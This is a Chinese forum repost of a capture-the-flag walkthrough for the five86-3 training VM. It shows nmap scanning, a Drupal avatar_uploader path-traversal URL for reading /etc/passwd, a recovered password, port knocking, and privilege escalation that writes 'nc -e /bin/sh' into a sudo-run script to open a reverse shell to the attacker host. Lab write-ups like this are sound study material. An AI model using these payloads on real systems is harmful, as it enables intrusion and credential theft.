• 售前

  • 售后

热门帖子
入门百科

five86-3靶机渗透攻略

[复制链接]
肥牛于田揖 显示全部楼层 发表于 2022-1-13 10:41:16 |阅读模式 打印 上一主题 下一主题
下载连接:https://www.five86.com/five86-3.html
信息收集

nmap扫描

nmap -sS -sV 192.168.93.0/24

可知目标ip:192.168.93.133 只开放80
网站信息收集

cms为drupal7

drupal目录穿越漏洞利用

使用msf发现失败,利用方式不同与DC1
搜索cms漏洞利用方式
https://www.exploit-db.com


  1. <code>EXP为:http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
复制代码

发现可登录 的用户为:steve、jan、sam、root
查看drupal7配置文件
/var/www/html/sites/default/settings.php


发现密码x4lB0XxX
现在知道用户:steve、jan、sam、root 密码:x4lB0XxX。但是没有登陆方式
ssh敲门

/etc/knockd.conf

需要15s内依次敲3个端口5004,4284,6872
knock -d 200 192.168.93.133 5004 4284 6872


端口看房状态维持60s,过后需要再敲
刚才几个用户只有sam能登上

提权

sudo -l
发现可执行root身份 /opt/scripts/restart-web.sh

发现sam对脚本有写权限

更改脚本
vi /opt/scripts/restart-web.sh
写入
nc -e /bin/sh 192.168.93.130 9999

kali监听端口
nc -lvvp 9999
执行脚本

提权成功,拿到flag!!


来源:https://blog.caogenba.net/weixin_47311099/article/details/122447029
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作